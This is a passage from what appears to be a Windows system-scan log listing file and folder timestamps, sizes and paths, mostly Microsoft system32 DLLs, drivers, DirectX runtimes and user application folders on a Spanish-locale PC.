2020-08-17 21:32 - 2020-08-17 21:32 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\UsoClient.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\WlanRadioManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\XboxGipRadioManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\umpo-overrides.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\RemovableMediaProvisioningPlugin.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000066336 _____ (Microsoft Corporation) C:\Windows\system32\wlrmdr.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\CertEnrollCtrl.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidspi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\ByteCodeGenerator.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000062976 _____ (Microsoft Corporation) C:\Windows\system32\LSCSHostPolicy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\vss_ps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000060432 _____ (Microsoft Corporation) C:\Windows\system32\CloudNotifications.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\AssignedAccessRuntime.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000059392 _____ (Microsoft Corporation) C:\Windows\system32\UserLanguageProfileCallback.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wcimage.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\audioresourceregistrar.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000056672 _____ (Microsoft Corporation) C:\Windows\system32\rtmmvrortc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000056632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pciidex.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\MSAProfileNotificationHandler.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\NfcRadioMedia.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000053248 _____ C:\Windows\system32\Drivers\UsbPmApi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000052752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmstorfl.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000052224 _____ (Microsoft Corporation) C:\Windows\system32\tetheringconfigsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000051712 _____ (Microsoft Corporation) C:\Windows\system32\MdmDiagnosticsTool.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000051200 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000049152 _____ (Microsoft Corporation) C:\Windows\system32\XInputUap.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\mcicda.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000048256 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000047616 _____ C:\Windows\system32\UsbPmApi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\devauthe.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000047000 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000046632 _____ (Microsoft Corporation) C:\Windows\system32\browser_broker.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\printfilterpipelineprxy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidparse.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\compact.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryCore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidusb.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cellulardatacapabilityhandler.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.Common.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000043536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsc.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\WiredNetworkCSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\UpgradeResultsUI.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\WordBreakers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\WiFiConfigSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\atlthunk.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000040248 _____ (Microsoft Corporation) C:\Windows\system32\LocationFrameworkPS.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\WpcProxyStubs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000037888 _____ C:\Windows\system32\usocoreps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000037392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wimmount.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wlansvcpal.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\IcsEntitlementHost.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BthMini.SYS
2020-08-17 21:32 - 2020-08-17 21:32 - 000036352 _____ (Microsoft Corporation) C:\Windows\system32\sxstrace.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbGD.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\DevQueryBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\mciwave.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Provisioning.ProxyStub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\sxssrv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000032768 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSaveTask.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000032256 _____ (Microsoft Corporation) C:\Windows\system32\WsmAgent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\FaxPrinterInstaller.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000030208 _____ (Microsoft Corporation) C:\Windows\system32\mciseq.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000030008 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\atapi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000029712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tbs.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000028936 _____ (Microsoft Corporation) C:\Windows\system32\vmbuspipe.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicPS.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\wscisvif.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\Win32_DeviceGuard.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\lstelemetry.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\vdsldr.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\autopilotdiag.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\appidtel.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\wci.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\CSystemEventsBrokerClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.ps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000023352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\isapnp.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000023040 _____ (Microsoft Corporation) C:\Windows\system32\dsregtask.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\sbservicetrigger.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000019984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelide.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\mpnotify.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000019256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msisadrv.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\wscproxystub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sfloppy.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\applockerfltr.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\bindflt.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000016912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pciide.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\iscsilog.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000013312 _____ C:\Windows\system32\agentactivationruntimestarter.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\dstokenclean.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\LaunchTM.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000009216 _____ (Microsoft Corporation) C:\Windows\system32\wscadminui.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000003584 _____ (Microsoft Corporation) C:\Windows\system32\TpmCertResources.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tier2punctuations.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\TelephonyInteractiveUserRes.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6r.dll
2020-08-17 21:30 - 2020-09-02 00:13 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\AIMP
2020-08-17 21:26 - 2020-08-17 21:26 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Opera Software
2020-08-17 21:26 - 2020-08-17 21:26 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Opera Software
2020-08-17 21:03 - 2020-08-19 09:18 - 000000253 _____ C:\Users\Hetitor\Documents\ofc.cfg
2020-08-17 20:45 - 2020-08-17 20:45 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\WinRAR
2020-08-17 20:13 - 2020-08-17 20:13 - 000000000 ____D C:\Users\Hetitor\Documents\Plantillas personalizadas de Office
2020-08-17 17:20 - 2020-08-18 08:33 - 000000000 ____D C:\Program Files\UNP
2020-08-17 08:28 - 2020-08-28 16:45 - 000000000 ___HD C:\OneDriveTemp
2020-08-16 23:20 - 2020-07-18 00:07 - 000390656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-08-16 23:20 - 2020-07-17 23:53 - 000492544 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-08-16 23:19 - 2020-08-16 23:20 - 000000000 ____D C:\Windows\system32\MRT
2020-08-16 23:19 - 2020-08-16 23:19 - 120636720 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-08-16 21:30 - 2020-08-20 13:08 - 000000000 ____D C:\Windows\Panther
2020-08-16 21:24 - 2020-09-01 18:40 - 000000000 ____D C:\Users\Hetitor\AppData\Local\PlaceholderTileLogoFolder
2020-08-16 21:21 - 2020-09-02 09:10 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\DMCache
2020-08-16 21:21 - 2020-09-01 14:03 - 000000000 ____D C:\Users\Hetitor\Downloads\Compressed
2020-08-16 21:21 - 2020-08-30 16:11 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\IDM
2020-08-16 21:21 - 2020-08-24 17:23 - 000000000 ____D C:\Users\Hetitor\Downloads\Video
2020-08-16 21:21 - 2020-08-16 21:22 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
2020-08-16 21:21 - 2020-08-16 21:21 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2020-08-16 21:21 - 2020-08-16 21:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2020-08-16 21:21 - 2020-08-16 21:21 - 000000000 ____D C:\ProgramData\IDM
2020-08-16 21:20 - 2020-08-16 21:20 - 010349352 _____ (Tonec Inc.) C:\Users\Hetitor\Downloads\idman638build2.exe
2020-08-16 21:18 - 2020-08-16 21:18 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome
2020-08-16 21:05 - 2020-08-24 12:07 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-08-16 21:05 - 2020-08-16 21:05 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-08-16 21:05 - 2020-08-16 21:05 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\AMD
2020-08-16 21:04 - 2020-08-16 21:05 - 000000000 ____D C:\Program Files (x86)\Google
2020-08-16 21:03 - 2020-08-20 11:23 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Google
2020-08-16 20:34 - 2020-08-17 21:32 - 002876416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2020-08-16 20:34 - 2020-08-16 20:34 - 000000000 ____D C:\Windows\CSC
2020-08-16 20:34 - 2020-08-16 20:34 - 000000000 ____D C:\ProgramData\USOShared
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Public\Documents\Mis vídeos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Public\Documents\Mis imágenes
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Public\Documents\Mi música
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Reciente
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Plantillas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Mis documentos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Menú Inicio
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Impresoras
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Entorno de red
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Documents\Mis vídeos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Documents\Mis imágenes
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Documents\Mi música
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Datos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\Configuración local
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\AppData\Local\Historial
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\AppData\Local\Datos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default\AppData\Local\Archivos temporales de Internet
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Reciente
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Plantillas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Mis documentos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Menú Inicio
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Impresoras
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Entorno de red
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Documents\Mis vídeos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Documents\Mis imágenes
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Documents\Mi música
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Datos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\Configuración local
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\AppData\Local\Historial
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\AppData\Local\Datos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Users\Default User\AppData\Local\Archivos temporales de Internet
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Plantillas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programas
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Menú Inicio
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Escritorio
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Documentos
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\ProgramData\Datos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Program Files\Archivos comunes
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Documents and Settings
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 _SHDL C:\Archivos de programa
2020-08-16 20:32 - 2020-08-16 20:32 - 000000000 ____D C:\Windows\minidump
2020-08-16 20:30 - 2020-09-02 09:10 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-08-16 20:30 - 2020-09-01 23:08 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-08-16 20:30 - 2020-08-22 08:12 - 000527416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-08-16 20:30 - 2020-08-16 23:03 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-08-16 20:30 - 2020-08-16 20:30 - 000000000 ____D C:\Windows\ServiceProfiles
2020-08-16 18:54 - 2020-08-16 23:23 - 000000000 ____D C:\ProgramData\Packages
2020-08-16 18:54 - 2020-08-16 21:40 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Comms
2020-08-16 18:51 - 2020-08-16 18:51 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2020-08-16 18:48 - 2010-06-02 04:55 - 000527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2020-08-16 18:48 - 2010-06-02 04:55 - 000518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2020-08-16 18:48 - 2010-06-02 04:55 - 000239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2020-08-16 18:48 - 2010-06-02 04:55 - 000176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2020-08-16 18:48 - 2010-06-02 04:55 - 000077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2020-08-16 18:48 - 2010-06-02 04:55 - 000074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 002526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 002401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 002106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 001998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 001907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 001868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 000511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 000470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 000276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2020-08-16 18:48 - 2010-05-26 11:41 - 000248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2020-08-16 18:48 - 2010-02-04 10:01 - 000022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2020-08-16 18:48 - 2009-09-04 17:44 - 000069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 005554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 005501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 002582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 002475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 001974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 001892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 000523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 000453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 000285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2020-08-16 18:48 - 2009-09-04 17:29 - 000235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
